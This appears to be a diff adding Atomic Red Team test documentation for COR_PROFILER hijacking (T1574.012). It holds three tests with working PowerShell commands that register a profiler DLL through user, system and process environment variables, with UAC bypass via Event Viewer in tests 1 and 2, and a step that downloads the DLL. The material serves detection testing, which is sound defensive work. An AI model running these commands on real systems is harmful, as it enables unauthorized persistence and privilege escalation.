+- [Atomic Test #1 - User scope COR_PROFILER](#atomic-test-1---user-scope-cor_profiler)
+
+- [Atomic Test #2 - System Scope COR_PROFILER](#atomic-test-2---system-scope-cor_profiler)
+
+- [Atomic Test #3 - Registry-free process scope COR_PROFILER](#atomic-test-3---registry-free-process-scope-cor_profiler)
+
+
+<br/>
+
+## Atomic Test #1 - User scope COR_PROFILER
+Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER).
+The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by the Event Viewer process.
+Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity.
+If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however,
+the notepad process will not execute with high integrity.
+
+Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| file_name | unmanaged profiler DLL | Path | PathToAtomicsFolder&#92;T1574.012&#92;bin&#92;T1574.012x64.dll|
+| clsid_guid | custom clsid guid | String | {09108e71-974c-4010-89cb-acf471ae9e2c}|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan
+New-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}\InprocServer32" -Value #{file_name} -Force | Out-Null
+New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
+New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
+New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
+Write-Host "executing eventvwr.msc" -ForegroundColor Cyan
+START MMC.EXE EVENTVWR.MSC
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}" -Recurse -Force -ErrorAction Ignore 
+Remove-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -Force -ErrorAction Ignore | Out-Null
+Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -Force -ErrorAction Ignore | Out-Null
+Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: #{file_name} must be present
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{file_name}) {exit 0} else {exit 1} 
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #2 - System Scope COR_PROFILER
+Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect.
+The unmanaged profiler DLL (T1574.012x64.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity
+level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will
+still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity.
+
+Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| file_name | unmanaged profiler DLL | Path | PathToAtomicsFolder&#92;T1574.012&#92;bin&#92;T1574.012x64.dll|
+| clsid_guid | custom clsid guid | String | {09108e71-974c-4010-89cb-acf471ae9e2c}|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+Write-Host "Creating system environment variables" -ForegroundColor Cyan
+New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
+New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
+New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -Force -ErrorAction Ignore | Out-Null
+Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -Force -ErrorAction Ignore | Out-Null
+Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: #{file_name} must be present
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{file_name}) {exit 0} else {exit 1} 
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #3 - Registry-free process scope COR_PROFILER
+Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by PowerShell.
+
+Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| file_name | unamanged profiler DLL | Path | PathToAtomicsFolder&#92;T1574.012&#92;bin&#92;T1574.012x64.dll|
+| clsid_guid | custom clsid guid | String | {09108e71-974c-4010-89cb-acf471ae9e2c}|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$env:COR_ENABLE_PROFILING = 1
+$env:COR_PROFILER = '#{clsid_guid}'
+$env:COR_PROFILER_PATH = '#{file_name}'
+POWERSHELL -c 'Start-Sleep 1'
+```
+
+#### Cleanup Commands:
+```powershell
+$env:COR_ENABLE_PROFILING = 0
+$env:COR_PROFILER = ''
+$env:COR_PROFILER_PATH = ''
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: #{file_name} must be present
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{file_name}) {exit 0} else {exit 1} 
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
+```
+
+
+
+
+<br/>